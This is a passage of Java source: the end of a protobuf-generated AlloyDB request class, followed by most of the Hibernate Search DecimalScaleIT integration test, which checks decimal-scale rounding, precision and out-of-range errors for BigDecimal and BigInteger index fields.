setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.alloydb.v1.CreateInstanceRequests) } // @@protoc_insertion_point(class_scope:google.cloud.alloydb.v1.CreateInstanceRequests) private static final com.google.cloud.alloydb.v1.CreateInstanceRequests DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.alloydb.v1.CreateInstanceRequests(); } public static com.google.cloud.alloydb.v1.CreateInstanceRequests getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CreateInstanceRequests> PARSER = new 
com.google.protobuf.AbstractParser<CreateInstanceRequests>() { @java.lang.Override public CreateInstanceRequests parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CreateInstanceRequests> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CreateInstanceRequests> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.alloydb.v1.CreateInstanceRequests getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
hibernate/hibernate-search
33,951
integrationtest/backend/tck/src/main/java/org/hibernate/search/integrationtest/backend/tck/decimalscale/DecimalScaleIT.java
/* * SPDX-License-Identifier: Apache-2.0 * Copyright Red Hat Inc. and Hibernate Authors */ package org.hibernate.search.integrationtest.backend.tck.decimalscale; import static org.assertj.core.api.Assertions.assertThat; import static org.assertj.core.api.Assertions.assertThatThrownBy; import static org.hibernate.search.util.impl.integrationtest.common.assertion.SearchResultAssert.assertThatQuery; import java.math.BigDecimal; import java.math.BigInteger; import org.hibernate.search.engine.backend.document.IndexFieldReference; import org.hibernate.search.engine.backend.document.model.dsl.IndexSchemaElement; import org.hibernate.search.engine.backend.types.Projectable; import org.hibernate.search.engine.mapper.mapping.building.spi.IndexFieldTypeDefaultsProvider; import org.hibernate.search.engine.mapper.mapping.building.spi.IndexedEntityBindingContext; import org.hibernate.search.engine.search.query.SearchQuery; import org.hibernate.search.integrationtest.backend.tck.testsupport.util.extension.SearchSetupHelper; import org.hibernate.search.util.common.SearchException; import org.hibernate.search.util.impl.integrationtest.mapper.stub.SimpleMappedIndex; import org.hibernate.search.util.impl.integrationtest.mapper.stub.StubMappedIndex; import org.junit.jupiter.api.Test; import org.junit.jupiter.api.extension.RegisterExtension; class DecimalScaleIT { /* * Longs only have 64 bits to represent the value, or approximately 18 decimal digits * (actually 19, but not all values with 19 digits can be represented). * We would expect the indexed value to be indexed with approximately that precision, * which is limited but still higher than the precision of doubles, * which have ~53 bits to represent the unscaled value, or approximately 16 decimal digits. * * TODO HSEARCH-3583 We do get this precision with the Lucene backend, * but unfortunately there's a bug in Elasticsearch that reduces precision * to that of a double. * We should fix that and raise this constant to 18. 
*/ int INDEX_PRECISION = 16; @RegisterExtension public final SearchSetupHelper setupHelper = SearchSetupHelper.create(); @Test void noDecimalScale_bigDecimal() { assertThatThrownBy( () -> setupHelper.start() .withIndex( StubMappedIndex.ofNonRetrievable( root -> root.field( "noScaled", f -> f.asBigDecimal() ).toReference() ) ) .setup() ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Invalid index field type: missing decimal scale", "Define the decimal scale explicitly" ); } @Test void noDecimalScale_bigInteger() { assertThatThrownBy( () -> setupHelper.start() .withIndex( StubMappedIndex.ofNonRetrievable( root -> root.field( "noScaled", f -> f.asBigInteger() ).toReference() ) ) .setup() ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Invalid index field type: missing decimal scale", "Define the decimal scale explicitly" ); } @Test void positiveDecimalScale_bigInteger() { assertThatThrownBy( () -> setupHelper.start() .withIndex( StubMappedIndex.ofNonRetrievable( root -> root.field( "positiveScaled", f -> f.asBigInteger().decimalScale( 3 ) ).toReference() ) ) .setup() ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Invalid index field type: decimal scale '3' is positive", "The decimal scale of BigInteger fields must be zero or negative" ); } @Test void decimalScale_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 3 ) ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.11111" ) ) ); // decimal scale is 3, affecting the search precision // so the provided value 739.11111 will be treated as if it were 739.111 matchGreaterThan( index, new BigDecimal( "739.11" ) ); doNotMatchGreaterThan( index, new BigDecimal( "739.111" ) ); } @Test void decimalScale_zeroScale_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( 
root -> new DecimalScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.11111" ) ) ); // decimal scale is 0, affecting the search precision // so the provided value 739.11111 will be treated as if it were 739 matchGreaterThan( index, new BigDecimal( "738" ) ); doNotMatchGreaterThan( index, new BigDecimal( "739" ) ); } @Test void decimalScale_zeroScale_bigInteger() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigInteger( "739" ) ) ); // decimal scale is 0, affecting the search precision // so the provided value 739 will be treated as if it were 739 matchGreaterThan( index, new BigInteger( "738" ) ); doNotMatchGreaterThan( index, new BigInteger( "739" ) ); } @Test void decimalScale_negativeScale_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, -3 ) ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "11111.11111" ) ) ); // decimal scale is -3, affecting the search precision // so the provided value 11111.11111 will be treated as if it were 11000 matchGreaterThan( index, new BigDecimal( "10000" ) ); doNotMatchGreaterThan( index, new BigDecimal( "11000" ) ); } @Test void decimalScale_negativeScale_bigInteger() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, -3 ) ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigInteger( "11111" ) ) ); // decimal scale is -3, affecting the search precision // so the provided value 11111 will be treated as if it were 11000 
matchGreaterThan( index, new BigInteger( "10000" ) ); doNotMatchGreaterThan( index, new BigInteger( "11000" ) ); } @Test void decimalScale_largeScale_bigDecimal() { final int schemaDecimalScale = 275; SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, schemaDecimalScale ) ); setupHelper.start().withIndex( index ).setup(); /* * Use extra digits in the original value, which will be assumed to be lost during indexing. * * The original value will look like this: * * 111111111111(...)111111.11111(...)111 * 10^-275 * * The indexed value lower bound will look like this: * * 111111111111(...)111110.0 * 10^-275 * * The indexed value upper bound will look like this: * * 111111111111(...)111112.0 * 10^-275 */ BigDecimal originalValue = bigDecimalWithOnes( INDEX_PRECISION, 50, schemaDecimalScale ); BigDecimal estimatedIndexedValue = bigDecimalWithOnes( INDEX_PRECISION, 0, schemaDecimalScale ); BigDecimal indexedValueLowerBound = estimatedIndexedValue.subtract( new BigDecimal( BigInteger.ONE, schemaDecimalScale ) ); BigDecimal indexedValueUpperBound = estimatedIndexedValue.add( new BigDecimal( BigInteger.ONE, schemaDecimalScale ) ); assertThat( originalValue ) .isBetween( indexedValueLowerBound, indexedValueUpperBound ); index.index( "1", doc -> doc.addValue( index.binding().scaled, originalValue ) ); matchGreaterThan( index, indexedValueLowerBound ); doNotMatchGreaterThan( index, indexedValueUpperBound ); } @Test void decimalScale_negativeScale_largeScale_bigDecimal() { final int schemaDecimalScale = -275; SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, schemaDecimalScale ) ); setupHelper.start().withIndex( index ).setup(); /* * Use extra digits in the original value, which will be assumed to be lost during indexing. 
* * The original value will look like this: * * 111111111111(...)111111.11111(...)111 * 10^275 * * The indexed value lower bound will look like this: * * 111111111111(...)111110.0 * 10^275 * * The indexed value upper bound will look like this: * * 111111111111(...)111112.0 * 10^275 */ BigDecimal originalValue = bigDecimalWithOnes( INDEX_PRECISION, 5, schemaDecimalScale ); BigDecimal estimatedIndexedValue = bigDecimalWithOnes( INDEX_PRECISION, 0, schemaDecimalScale ); BigDecimal indexedValueLowerBound = estimatedIndexedValue.subtract( new BigDecimal( BigInteger.ONE, schemaDecimalScale ) ); BigDecimal indexedValueUpperBound = estimatedIndexedValue.add( new BigDecimal( BigInteger.ONE, schemaDecimalScale ) ); assertThat( originalValue ) .isBetween( indexedValueLowerBound, indexedValueUpperBound ); index.index( "1", doc -> doc.addValue( index.binding().scaled, originalValue ) ); matchGreaterThan( index, indexedValueLowerBound ); doNotMatchGreaterThan( index, indexedValueUpperBound ); } @Test void decimalScale_negativeScale_largeScale_bigInteger() { final int schemaDecimalScale = -275; SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, schemaDecimalScale ) ); setupHelper.start().withIndex( index ).setup(); /* * Use extra digits in the original value, which will be assumed to be lost during indexing. 
* * The original value will look like this: * * 111111111111(...)111111.11111(...)111 * 10^275 * * The indexed value lower bound will look like this: * * 111111111111(...)111110.0 * 10^275 * * The indexed value upper bound will look like this: * * 111111111111(...)111112.0 * 10^275 */ BigInteger originalValue = bigDecimalWithOnes( INDEX_PRECISION, 100, schemaDecimalScale ).toBigIntegerExact(); BigInteger estimatedIndexedValue = bigDecimalWithOnes( INDEX_PRECISION, 0, schemaDecimalScale ).toBigIntegerExact(); BigInteger indexedValueLowerBound = estimatedIndexedValue.subtract( new BigDecimal( BigInteger.ONE, schemaDecimalScale ).toBigIntegerExact() ); BigInteger indexedValueUpperBound = estimatedIndexedValue.add( new BigDecimal( BigInteger.ONE, schemaDecimalScale ).toBigIntegerExact() ); assertThat( originalValue ) .isBetween( indexedValueLowerBound, indexedValueUpperBound ); index.index( "1", doc -> doc.addValue( index.binding().scaled, originalValue ) ); matchGreaterThan( index, indexedValueLowerBound ); doNotMatchGreaterThan( index, indexedValueUpperBound ); } @Test void decimalScale_rounding_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 2 ) ); setupHelper.start().withIndex( index ).setup(); index.bulkIndexer() .add( "1", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.114999" ) ) ) .add( "2", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.115" ) ) ) .add( "3", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.11" ) ) ) .add( "4", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.12" ) ) ) .join(); // RoundingMode.HALF_UP expected on both values: match( index, new BigDecimal( "739.11" ), "1", "3" ); match( index, new BigDecimal( "739.12" ), "2", "4" ); // and parameters: match( index, new BigDecimal( "739.114999" ), "1", "3" ); match( index, new BigDecimal( "739.115" ), "2", "4" ); } @Test void 
decimalScale_rounding_bigInteger() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, -4 ) ); setupHelper.start().withIndex( index ).setup(); index.bulkIndexer() .add( "1", doc -> doc.addValue( index.binding().scaled, new BigInteger( "7394999" ) ) ) .add( "2", doc -> doc.addValue( index.binding().scaled, new BigInteger( "7395000" ) ) ) .add( "3", doc -> doc.addValue( index.binding().scaled, new BigInteger( "7390000" ) ) ) .add( "4", doc -> doc.addValue( index.binding().scaled, new BigInteger( "7400000" ) ) ) .join(); // RoundingMode.HALF_UP expected on both values: match( index, new BigInteger( "7390000" ), "1", "3" ); match( index, new BigInteger( "7400000" ), "2", "4" ); // and parameters: match( index, new BigInteger( "7394999" ), "1", "3" ); match( index, new BigInteger( "7395000" ), "2", "4" ); } @Test void decimalScale_largeDecimal_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); // That seems a limit for ES. Even if new BigDecimal( "2" ).pow( 54 ) << Long.MAX_VALUE // If the exponent were 54, the test would fail for Elasticsearch, whereas it would work for Lucene backend. BigDecimal largeDecimal = new BigDecimal( "2" ).pow( 53 ); index.index( "1", doc -> doc.addValue( index.binding().scaled, largeDecimal ) ); // the precision is supposed to be preserved matchGreaterThan( index, largeDecimal.subtract( BigDecimal.ONE ) ); doNotMatchGreaterThan( index, largeDecimal ); } @Test void decimalScale_largeDecimal_bigInteger() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); // That seems a limit for ES. 
Even if new BigDecimal( "2" ).pow( 54 ) << Long.MAX_VALUE // If the exponent were 54, the test would fail for Elasticsearch, whereas it would work for Lucene backend. BigInteger largeInteger = new BigInteger( "2" ).pow( 53 ); index.index( "1", doc -> doc.addValue( index.binding().scaled, largeInteger ) ); // the precision is supposed to be preserved matchGreaterThan( index, largeInteger.subtract( BigInteger.ONE ) ); doNotMatchGreaterThan( index, largeInteger ); } @Test void decimalScale_tooLargeDecimal_scale0_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that cannot be represented as a long BigDecimal tooLargeDecimal = BigDecimal.valueOf( Long.MAX_VALUE ).multiply( BigDecimal.TEN ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeDecimal ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeDecimal.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale0_bigDecimal_queryPredicateBuildTime() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); BigDecimal veryLargeDecimal = BigDecimal.valueOf( Long.MAX_VALUE ); // Provide a value that cannot be represented as a long BigDecimal tooLargeDecimal = veryLargeDecimal.multiply( BigDecimal.TEN ); index.index( "1", doc -> doc.addValue( index.binding().scaled, veryLargeDecimal ) ); assertThatThrownBy( () -> index.createScope() .query().selectEntityReference() .where( p -> p.range().field( "scaled" ).atMost( tooLargeDecimal ) ) ) .isInstanceOf( SearchException.class ) 
.hasMessageContainingAll( "Unable to encode value '" + tooLargeDecimal.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale0_bigDecimal_lowerBound() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that cannot be represented as a long BigDecimal tooLargeDecimal = BigDecimal.valueOf( Long.MIN_VALUE ).multiply( BigDecimal.TEN ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeDecimal ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeDecimal.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale0_bigInteger() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that cannot be represented as a long BigInteger tooLargeInteger = BigInteger.valueOf( Long.MAX_VALUE ).multiply( BigInteger.TEN ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeInteger ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeInteger.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale0_bigInteger_lowerBound() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new 
IntegerScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that cannot be represented as a long BigInteger tooLargeInteger = BigInteger.valueOf( Long.MIN_VALUE ).multiply( BigInteger.TEN ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeInteger ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeInteger.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale0_bigInteger_lowerBound_queryPredicateBuildTime() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); BigInteger veryLargeNegativeInteger = BigInteger.valueOf( Long.MIN_VALUE ); // Provide a value that cannot be represented as a long BigInteger tooLargeInteger = veryLargeNegativeInteger.multiply( BigInteger.TEN ); index.index( "1", doc -> doc.addValue( index.binding().scaled, veryLargeNegativeInteger ) ); assertThatThrownBy( () -> index.createScope() .query().selectEntityReference() .where( p -> p.range().field( "scaled" ).atLeast( tooLargeInteger ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeInteger.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale2_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 2 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that if it were divided by 10, could not be represented as a long, because the scale 
of 2 BigDecimal tooLargeDecimal = BigDecimal.valueOf( Long.MAX_VALUE ).divide( BigDecimal.TEN ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeDecimal ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeDecimal.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale2_bigDecimal_lowerBound() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 2 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that if it were divided by 10, could not be represented as a long, because the scale of 2 BigDecimal tooLargeDecimal = BigDecimal.valueOf( Long.MIN_VALUE ).divide( BigDecimal.TEN ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeDecimal ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeDecimal.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale2_bigDecimal_lowerBound_queryPredicateBuildTime() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 2 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that if it were divided by 10, could not be represented as a long, because the scale of 2 BigDecimal tooLargeDecimal = BigDecimal.valueOf( Long.MIN_VALUE ).divide( BigDecimal.TEN ); BigDecimal veryLargeDecimal = tooLargeDecimal.divide( BigDecimal.TEN ); index.index( "1", doc -> doc.addValue( index.binding().scaled, veryLargeDecimal ) ); assertThatThrownBy( 
() -> index.createScope() .query().selectEntityReference() .where( p -> p.range().field( "scaled" ).atLeast( tooLargeDecimal ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeDecimal.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scaleMinus2_bigInteger() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, -2 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that if it were multiplied by 100, could not be represented as a long, because the scale of -2 BigInteger tooLargeInteger = BigInteger.valueOf( Long.MAX_VALUE ).multiply( new BigInteger( "1000" ) ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeInteger ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeInteger.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scaleMinus2_bigInteger_queryPredicateBuildTime() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, -2 ) ); setupHelper.start().withIndex( index ).setup(); BigInteger veryLargeInteger = BigInteger.valueOf( Long.MAX_VALUE ); // Provide a value that if it were multiplied by 100, could not be represented as a long, because the scale of -2 BigInteger tooLargeInteger = veryLargeInteger.multiply( new BigInteger( "1000" ) ); index.index( "1", doc -> doc.addValue( index.binding().scaled, veryLargeInteger ) ); assertThatThrownBy( () -> index.createScope() .query().selectEntityReference() .where( p -> 
p.range().field( "scaled" ).atMost( tooLargeInteger ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeInteger.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scaleMinus2_bigInteger_lowerBound() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, -2 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that if it were multiplied by 100, could not be represented as a long, because the scale of -2 BigInteger tooLargeInteger = BigInteger.valueOf( Long.MIN_VALUE ).multiply( new BigInteger( "1000" ) ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeInteger ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeInteger.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void defaultDecimalScale_bigDecimal() { SimpleMappedIndex<DefaultDecimalScaleIndexBinding> index = SimpleMappedIndex.ofAdvanced( DefaultDecimalScaleIndexBinding::new ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.11111" ) ) ); // default decimal scale is 2, affecting the search precision // so the provided value 739.11111 will be treated as if it were 739.11 matchGreaterThan( index, new BigDecimal( "739.1" ) ); doNotMatchGreaterThan( index, new BigDecimal( "739.11" ) ); } @Test void defaultDecimalScale_bigInteger() { SimpleMappedIndex<DefaultIntegerScaleIndexBinding> index = SimpleMappedIndex.ofAdvanced( DefaultIntegerScaleIndexBinding::new ); setupHelper.start().withIndex( 
index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigInteger( "7391111" ) ) ); // default decimal scale is -2, affecting the search precision // so the provided value 7391111 will be treated as if it were 7391100 matchGreaterThan( index, new BigInteger( "7391000" ) ); doNotMatchGreaterThan( index, new BigInteger( "7391100" ) ); } @Test void decimalScale_andDefaultDecimalScale_bigDecimal() { SimpleMappedIndex<BothDecimalScaleIndexBinding> index = SimpleMappedIndex.ofAdvanced( BothDecimalScaleIndexBinding::new ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.11111" ) ) ); // default decimal scale is 2 // decimal scale has been set to 3, overriding the default and affecting the search precision // so the provided value 739.11111 will be treated as if it were 739.111 matchGreaterThan( index, new BigDecimal( "739.11" ) ); doNotMatchGreaterThan( index, new BigDecimal( "739.111" ) ); } @Test void decimalScale_andDefaultDecimalScale_bigInteger() { SimpleMappedIndex<BothIntegerScaleIndexBinding> index = SimpleMappedIndex.ofAdvanced( BothIntegerScaleIndexBinding::new ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigInteger( "7391111" ) ) ); // default decimal scale is -2, // decimal scale has been set to -3, overriding the default and affecting the search precision // so the provided value 7391111 will be treated as if it were 7391000 matchGreaterThan( index, new BigInteger( "7390000" ) ); doNotMatchGreaterThan( index, new BigInteger( "7391000" ) ); } @Test void decimalScale_doesNotAffectProjections_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 3 ) ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.11111" ) ) ); // 
even though decimal scale is 3, projected values wont be affected to projection( index, new BigDecimal( "739.11111" ) ); } @Test void decimalScale_doesNotAffectProjections_bigInteger() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, -7 ) ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigInteger( "73911111" ) ) ); // even though decimal scale is -7, projected values wont be affected to projection( index, new BigInteger( "73911111" ) ); } private void matchGreaterThan(StubMappedIndex index, Object value) { assertThatQuery( index.query() .where( p -> p.range().field( "scaled" ).greaterThan( value ) ) ) .hasDocRefHitsAnyOrder( index.typeName(), "1" ); } public void doNotMatchGreaterThan(StubMappedIndex index, Object value) { assertThatQuery( index.query() .where( p -> p.range().field( "scaled" ).greaterThan( value ) ) ) .hasNoHits(); } public void projection(StubMappedIndex index, BigDecimal value) { SearchQuery<Object> query = index.createScope().query() .select( p -> p.field( "scaled" ) ) .where( p -> p.matchAll() ) .toQuery(); assertThatQuery( query ).hasHitsExactOrder( value ); } public void projection(StubMappedIndex index, BigInteger value) { SearchQuery<Object> query = index.createScope().query() .select( p -> p.field( "scaled" ) ) .where( p -> p.matchAll() ) .toQuery(); assertThatQuery( query ).hasHitsExactOrder( value ); } private void match(StubMappedIndex index, Object matching, String match1, String match2) { assertThatQuery( index.query() .where( p -> p.match().field( "scaled" ).matching( matching ) ) ) .hasDocRefHitsAnyOrder( index.typeName(), match1, match2 ); } /** * @param digitsBeforeDot The number of times the digit {@code 1} appears before the decimal dot. * @param digitsAfterDot The number of times the digit {@code 1} appears after the decimal dot. * @param scale The scale of the resulting number. 
* @return A BigDecimal equal to this number: * {@code <the digit '1' as many times as digitsBeforeDot>.<the digit '1' as many times as digitsAfterDot> * 10^<scale>} */ private static BigDecimal bigDecimalWithOnes(int digitsBeforeDot, int digitsAfterDot, int scale) { BigInteger unscaled = bigIntegerWithOnes( digitsBeforeDot + digitsAfterDot ); return new BigDecimal( unscaled, scale + digitsAfterDot ); } /** * @param oneDigits The number of times the digit {@code 1} appears in most significant digits. * @return A BigInteger equal to this number: * {@code <the digit '1' as many times as oneDigits><the digit '0' as many times as zeroDigits>} */ private static BigInteger bigIntegerWithOnes(int oneDigits) { if ( oneDigits < 1 ) { throw new IllegalArgumentException(); } BigInteger number = BigInteger.ONE; for ( int i = 1 /* we start with one digit */; i < oneDigits; i++ ) { number = number.multiply( BigInteger.TEN ).add( BigInteger.ONE ); } return number; } private static class DecimalScaleIndexBinding { IndexFieldReference<BigDecimal> scaled; DecimalScaleIndexBinding(IndexSchemaElement root, int decimalScale) { scaled = root.field( "scaled", f -> f.asBigDecimal().projectable( Projectable.YES ).decimalScale( decimalScale ) ) .toReference(); } } private static class DefaultDecimalScaleIndexBinding { IndexFieldReference<BigDecimal> scaled; DefaultDecimalScaleIndexBinding(IndexedEntityBindingContext ctx) { scaled = ctx.schemaElement() .field( "scaled", ctx.createTypeFactory( new IndexFieldTypeDefaultsProvider( 2 ) ).asBigDecimal() ) .toReference(); } } private static class BothDecimalScaleIndexBinding { IndexFieldReference<BigDecimal> scaled; BothDecimalScaleIndexBinding(IndexedEntityBindingContext ctx) { scaled = ctx.schemaElement() // setting both default decimal scale .field( "scaled", ctx.createTypeFactory( new IndexFieldTypeDefaultsProvider( 2 ) ) // and the not-default decimal scale .asBigDecimal().decimalScale( 3 ) ) .toReference(); } } private static class 
